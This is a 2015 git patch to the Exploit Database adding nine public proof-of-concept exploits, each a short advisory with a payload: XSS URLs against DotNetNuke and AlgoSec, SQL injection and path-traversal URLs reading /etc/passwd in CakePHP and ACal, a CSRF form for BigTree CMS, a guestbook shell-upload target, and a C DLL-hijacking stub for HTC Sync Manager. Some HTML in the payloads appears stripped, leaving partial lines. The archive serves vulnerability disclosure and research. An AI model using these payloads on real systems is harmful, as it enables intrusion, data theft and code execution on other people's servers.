From 41bf68ffcdb11007eef959703e9a388b2d8c0c74 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 16 Nov 2015 05:02:02 +0000 Subject: [PATCH] DB: 2015-11-16 9 new exploits --- files.csv | 9 +++++++++ platforms/asp/webapps/38696.txt | 9 +++++++++ platforms/cgi/webapps/38691.txt | 13 +++++++++++++ platforms/hardware/remote/38692.txt | 9 +++++++++ platforms/php/webapps/38689.txt | 9 +++++++++ platforms/php/webapps/38690.html | 19 +++++++++++++++++++ platforms/php/webapps/38693.txt | 9 +++++++++ platforms/php/webapps/38695.txt | 11 +++++++++++ platforms/php/webapps/38697.txt | 9 +++++++++ platforms/windows/remote/38694.txt | 18 ++++++++++++++++++ 10 files changed, 115 insertions(+) create mode 100755 platforms/asp/webapps/38696.txt create mode 100755 platforms/cgi/webapps/38691.txt create mode 100755 platforms/hardware/remote/38692.txt create mode 100755 platforms/php/webapps/38689.txt create mode 100755 platforms/php/webapps/38690.html create mode 100755 platforms/php/webapps/38693.txt create mode 100755 platforms/php/webapps/38695.txt create mode 100755 platforms/php/webapps/38697.txt create mode 100755 platforms/windows/remote/38694.txt diff --git a/files.csv b/files.csv index ccd96049f..8a46ef39b 100755 --- a/files.csv +++ b/files.csv @@ -34960,3 +34960,12 @@ id,file,description,date,author,platform,type,port 38686,platforms/linux/local/38686.py,"TUDU 0.82 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,local,0 38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field SEH Overflow",2015-11-12,"Nipun Jaswal",windows,dos,0 38688,platforms/php/webapps/38688.txt,"b374k Web Shell - CSRF Command Injection",2015-11-13,hyp3rlinx,php,webapps,0 +38689,platforms/php/webapps/38689.txt,"SilverStripe 'MemberLoginForm.php' Information Disclosure Vulnerability",2013-08-01,"Fara Rustein",php,webapps,0 +38690,platforms/php/webapps/38690.html,"BigTree CMS Cross Site Request Forgery Vulnerability",2013-07-17,"High-Tech Bridge",php,webapps,0 +38691,platforms/cgi/webapps/38691.txt,"Kwok Information Server Multiple SQL Injection Vulnerabilities",2013-08-07,"Yogesh Phadtare",cgi,webapps,0 +38692,platforms/hardware/remote/38692.txt,"AlgoSec Firewall Analyzer Cross Site Scripting Vulnerability",2013-08-16,"Asheesh kumar Mani Tripathi",hardware,remote,0 +38693,platforms/php/webapps/38693.txt,"Advanced Guestbook 'addentry.php' Arbitrary Shell Upload Vulnerability",2013-08-08,"Ashiyane Digital Security Team",php,webapps,0 +38694,platforms/windows/remote/38694.txt,"HTC Sync Manager Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2013-08-11,Iranian_Dark_Coders_Team,windows,remote,0 +38695,platforms/php/webapps/38695.txt,"CakePHP AssetDispatcher Class Local File Include Vulnerability",2013-08-13,"Takeshi Terada",php,webapps,0 +38696,platforms/asp/webapps/38696.txt,"DotNetNuke 6.1.x Cross Site Scripting Vulnerability",2013-08-13,"Sajjad Pourali",asp,webapps,0 +38697,platforms/php/webapps/38697.txt,"ACal 2.2.6 'view' Parameter Local File Include Vulnerability",2013-08-15,ICheer_No0M,php,webapps,0 diff --git a/platforms/asp/webapps/38696.txt b/platforms/asp/webapps/38696.txt new file mode 100755 index 000000000..73deff9e6 --- /dev/null +++ b/platforms/asp/webapps/38696.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/61770/info + +DotNetNuke is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +DotNetNuke prior to versions 7.1.1 and 6.2.9 are vulnerable. + +http://www.example.com/?__dnnVariable={'__dnn_pageload':'alert(/XSS/)'} \ No newline at end of file diff --git a/platforms/cgi/webapps/38691.txt b/platforms/cgi/webapps/38691.txt new file mode 100755 index 000000000..757987b39 --- /dev/null +++ b/platforms/cgi/webapps/38691.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/61728/info + +Kwok Information Server is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Kwok Information Server 2.7.3 and 2.8.4 are vulnerable; other versions may also be affected. + +http://www.example.com/kwok/IT/hardware-list.dll?cmd=search&hardwareType=49[Inject Payload Here] + +http://www.example.com/kwok/IT/hardware-list.dll?cmd=search&hardwareStatus=0[Inject Payload Here] + +http://www.example.com/kwok/IT/hardware-list.dll?cmd=search&hardwareLocation=0[Inject Payload Here] \ No newline at end of file diff --git a/platforms/hardware/remote/38692.txt b/platforms/hardware/remote/38692.txt new file mode 100755 index 000000000..66c52172f --- /dev/null +++ b/platforms/hardware/remote/38692.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/61733/info + +AlgoSec Firewall Analyzer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +AlgoSec Firewall Analyzer 6.1-b86 is affected; other versions may also be vulnerable. + +http//www.example.com/afa/php/Login.php/>'> HTTP/1.1 \ No newline at end of file diff --git a/platforms/php/webapps/38689.txt b/platforms/php/webapps/38689.txt new file mode 100755 index 000000000..837ed65c9 --- /dev/null +++ b/platforms/php/webapps/38689.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/61578/info + +SilverStripe is prone to an information-disclosure vulnerability. + +An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks. + +SilverStripe 3.0.3 is vulnerable; other versions may also be affected. + +http:///Security/LoginForm?AuthenticationMethod=MemberAuthenticator&Email=&Password=&BackURL=%2Fadmin%2Fpages&action_dologin=Log+in \ No newline at end of file diff --git a/platforms/php/webapps/38690.html b/platforms/php/webapps/38690.html new file mode 100755 index 000000000..2e67e203d --- /dev/null +++ b/platforms/php/webapps/38690.html @@ -0,0 +1,19 @@ +source: http://www.securityfocus.com/bid/61702/info + +BigTree CMS is prone to a cross-site request-forgery vulnerability. + +Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. + +BigTree CMS 4.0 RC2 is vulnerable; other versions may also be affected. + +
+ + + + + + +
+ diff --git a/platforms/php/webapps/38693.txt b/platforms/php/webapps/38693.txt new file mode 100755 index 000000000..7d130c471 --- /dev/null +++ b/platforms/php/webapps/38693.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/61735/info + +Advanced Guestbook is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. + +An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. + +Advanced Guestbook 2.4.3 is vulnerable; other versions may also be affected. + +http://www.example.com.tw/guestbook/addentry.php \ No newline at end of file diff --git a/platforms/php/webapps/38695.txt b/platforms/php/webapps/38695.txt new file mode 100755 index 000000000..9da920906 --- /dev/null +++ b/platforms/php/webapps/38695.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/61746/info + +CakePHP is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker can exploit this vulnerability to view files or execute arbitrary script code in the context of the web server process. This may aid in further attacks. + +CakePHP 2.2.8 and 2.3.7 are vulnerable; other versions may also be affected. + +http://www.example.com/cakephp-2.3.7/theme/Test1/%2e.//%2e.//%2e.//%2e. //%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd + +http://www.example.com/cakephp-2.3.7/DebugKit/%2e.//%2e.//%2e.//%2e.// %2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/38697.txt b/platforms/php/webapps/38697.txt new file mode 100755 index 000000000..f1d5f81d6 --- /dev/null +++ b/platforms/php/webapps/38697.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/61801/info + +ACal is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input before being used to include files. + +An attacker can exploit this vulnerability to view files or execute arbitrary script code in the context of the web server process. This may aid in further attacks. + +ACal 2.2.6 is vulnerable; other versions may also be affected. + +http://www.example.com/calendar/embed/example/example.php?view=../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/windows/remote/38694.txt b/platforms/windows/remote/38694.txt new file mode 100755 index 000000000..3b0da6b7c --- /dev/null +++ b/platforms/windows/remote/38694.txt @@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/61745/info + +HTC Sync Manager is prone to multiple arbitrary code-execution vulnerabilities. + +An attacker can exploit these issues by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. + +HTC Sync Manager 2.1.46.0 is vulnerable; other versions may also be affected. + +#include +#define DllExport __declspec (dllexport) +DllExport void DwmSetWindowAttribute() { egg(); } + +int egg() +{ + system ("calc"); + exit(0); + return 0; +}